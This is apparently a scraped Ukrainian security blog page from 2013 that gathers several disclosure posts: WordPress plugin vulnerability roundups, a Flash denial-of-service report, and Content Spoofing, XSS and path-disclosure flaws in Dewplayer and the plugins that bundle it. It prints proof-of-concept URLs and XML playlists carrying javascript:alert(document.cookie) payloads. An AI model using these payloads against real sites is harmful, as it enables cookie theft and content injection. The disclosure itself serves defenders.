Добірка уразливостей
17:21 28.12.2013В даній добірці уразливості в веб додатках:
В даній добірці уразливості в веб додатках:
Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.
Цього разу повідомляю про уразливості в плагінах MobileChief, Curvo та MoneyTheme. Для котрих з’явилися експлоіти. MobileChief - це плагін для створення мобільного сайта, Curvo - це тема движка, MoneyTheme - це тема движка.
Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.
На початку року я вже писав про Denial of Service уразливість в Adobe Flash. Тоді уразливість стосувался останньої на той момент версій Flash плагіна 11.5.502.146 і була приховано виправлена Адобом в своєму патчі APSB13-05. Компанія тоді з’їхала, що під час виправлення іншої дірки вони “випадково” виправили мою дірку (але враховуючи, що за 1,5 місяці тестування вони не змогли відтворити її на своїх комп’ютерах, то вони списали це на баг драйверів AMD/ATI, тому заявили, що ця дірка їх не стосується).
На початку грудня, зокрема 09.12.2013, я виявив новий DoS в Flash, що призводить до зависання ОС. Ця Denial of Service уразливість в Adobe Flash може бути повністю новою діркою, або мати відношення до попередньої DoS (коли Адоб в нових версіях Флеша “відновила” її). Дана DoS спрацьовує при перегляді відео через флеш плагін і призводить до краху операційної системи (BSOD). Про що найближчим часом повідомлю розробникам додатку. На протязі всього місяця у мене зависає ОС при перегляді відео у флеші на ПК з відеокартою AMD/ATI (перевіряв на різних комп’ютерах).
На відміну від попередньої DoS уразливості, нова дірка працює в більшій кількості браузерів і навіть на різних ОС. А також вона працює по суті в усіх флеш відео плеєрах - на будь-яких сайтах, в тому числі на YouTube (не вимагаючи флешки VideoJS, як попередня).
Denial of Service:
Це memory corruption (access violation) уразливість. Яка може використовуватися для краху системи та потенційно для віддаленого виконання коду. Ось відео демонстрація:
У відео-ролику показаний сайт з JW Player (але зависання ОС відбуваються на будь-яких флеш відео плеєрах). На Windows XP частіше відбувається повне зависання ПК, а BSOD виводиться лише у 5% випадків. А на Windows 7 BSOD має місце у 85%.
Атака працює в браузерах Firefox (на XP зависання або BSOD може відбутися з першого, а може і не з першого разу). У Mozilla Firefox 3.0.19, 10.0.7 ESR, 15.0.1 і 26 - зависання браузера і BSOD системи.
Уразливі Adobe Flash 11.9.900.152 та 11.9.900.170 (остання версія) для Windows та Flash 11.2.202.332 для Linux (остання версія для цієї ОС). На Linux (Ubuntu 13.04) 100% завантаження CPU, а на Windows (XP і 7) - зависання ОС.
В даній добірці уразливості в веб додатках:
Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.
Цього разу повідомляю про уразливості в плагінах e-Commerce Payment Gateways Caller, DailyDeal та GeoPlaces. Для котрих з’явилися експлоіти. e-Commerce Payment Gateways Caller - це плагін для роботи з платіжними шлюзами, DailyDeal - це тема движка, GeoPlaces - це тема движка.
Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.
У лютому, 02.02.2013, я виявив Content Spoofing та Cross-Site Scripting уразливості в плагінах для WordPress, Joomla і Plone, що містять Dewplayer. Раніше я писав про уразливості в Dewplayer.
Це дуже поширена флешка, що знаходиться на сотнях тисяч веб сайтів і яка використовується в багатьох веб додатках. При стандартному пошуку Dewplayer через Гугл дорки виводиться 422000 сайтів (і це лише для флешки dewplayer.swf, а ще інші імена файлів цього плеєра).
Цей флеш медіа плеєр в наступних плагінах: Dewplayer WordPress plugin, JosDewplayer і mosdewplayer для Joomla та collective.dewplayer для Plone. Також можуть бути інші плагіни з Dewplayer.
Наявність конкретної CS та XSS уразливості залежить від версії плеєра, що постачається з конкретним плагіном. При цьому адмін сайта може встановити більш нову версію флешки ніж та, що постачається з плагіном.
Dewplayer для WordPress:
З плагіном постачаються наступні флешки: dewplayer.swf, dewplayer-mini.swf, dewplayer-multi.swf. Вони всі мають CS дірки.
Content Spoofing (Content Injection) (WASC-12):
http://site/wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.swf?mp3=1.mp3
http://site/wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.swf?file=1.mp3
http://site/wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.swf?sound=1.mp3
http://site/wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.swf?son=1.mp3
Full path disclosure (WASC-13):
http://site/wp-content/plugins/dewplayer-flash-mp3-player/dewplayer.php
JosDewplayer і mosdewplayer:
Плагін JosDewplayer базується на mosdewplayer, тому дірки в них мають збігатися.
З плагіном постачаються наступні флешки: dewplayer.swf, dewplayer-multi.swf, dewplayer-playlist.swf, dewplayer-rect.swf. Вони всі мають CS дірки.
http://site/plugins/content/josdewplayer/dewplayer.swf
collective.dewplayer:
З плагіном постачаються наступні флешки: dewplayer-mini.swf, dewplayer.swf, dewplayer-multi.swf, dewplayer-rect.swf, dewplayer-playlist.swf, dewplayer-bubble.swf, dewplayer-vinyl.swf. Всі ці флешки мають CS, а dewplayer-vinyl.swf ще і XSS дірки.
Шлях на сайті може бути різним:
http://site/files/++resource++collective.dewplayer/dewplayer.swf
Content Spoofing (Content Injection) (WASC-12):
http://site/path/dewplayer.swf?mp3=1.mp3
XSS (WASC-08):
http://site/path/dewplayer-vinyl.swf?xml=xss.xml
Вразливі наступні веб додатки: Dewplayer WordPress plugin 1.2 і попередні версії, JosDewplayer 2.0 і попередні версії, всі версії mosdewplayer, collective.dewplayer 1.2 і попередні версії.
Вразливі веб додатки, що використовують Dewplayer 2.2.2 і попередні версії.
Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.
Цього разу повідомляю про уразливості в плагінах Videowall, dhtmlxSpreadsheet та WPLocalPlaces. Для котрих з’явилися експлоіти. Videowall - це плагін для розміщення списку відео, dhtmlxSpreadsheet - це плагін для розміщення таблиць, WPLocalPlaces - це плагін.
Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.
В даній добірці уразливості в веб додатках:
25.10.2013
У лютому, 02.02.2013, я виявив Content Spoofing та Cross-Site Scripting уразливості в Dewplayer. Про що найближчим часом повідомлю розробникам веб додатку.
Детальна інформація про уразливості з’явиться пізніше.
19.12.2013
Content Spoofing (Content Injection) (WASC-12):
http://site/dewplayer.swf?mp3=1.mp3
http://site/dewplayer.swf?file=1.mp3
http://site/dewplayer.swf?sound=1.mp3
http://site/dewplayer.swf?son=1.mp3
Це для старих версій плеєра. У версіях Dewplayer 2.x з цих 4 варіантів є тільки mp3.
Content Spoofing (Content Injection) (WASC-12):
http://site/dewplayer.swf?xml=1.xml
1.xml
<playlist version="1">
<trackList>
<track>
<location>http://site/1.mp3</location>
<creator/>
<album/>
<title>Music</title>
<annotation/>
<duration/>
<image/>
<info/>
<link/>
</track>
</trackList>
</playlist>
2.xml (з зображенням)
<playlist version="1">
<trackList>
<track>
<location>http://site/1.mp3</location>
<creator/>
<album/>
<title>Music</title>
<annotation/>
<duration/>
<image>http://site/1.jpg</image>
<info/>
<link/>
</track>
</trackList>
</playlist>
XSS (WASC-08):
http://site/dewplayer-vinyl.swf?xml=xss.xml
http://site/dewplayer-vinyl-en.swf?xml=xss.xml
xss.xml
<playlist version="1">
<trackList>
<track>
<location>javascript:alert(document.cookie)</location>
<title>XSS</title>
</track>
</trackList>
</playlist>
http://site/dewplayer-vinyl.swf?xml=xss2.xml
http://site/dewplayer-vinyl-en.swf?xml=xss2.xml
xss2.xml
<playlist version="1">
<trackList>
<track>
<location>1.mp3</location>
<title>XSS</title>
<link>javascript:alert(document.cookie)</link>
</track>
</trackList>
</playlist>
Уразливі Dewplayer 2.2.2 та попередні версії.
В даній добірці уразливості в веб додатках: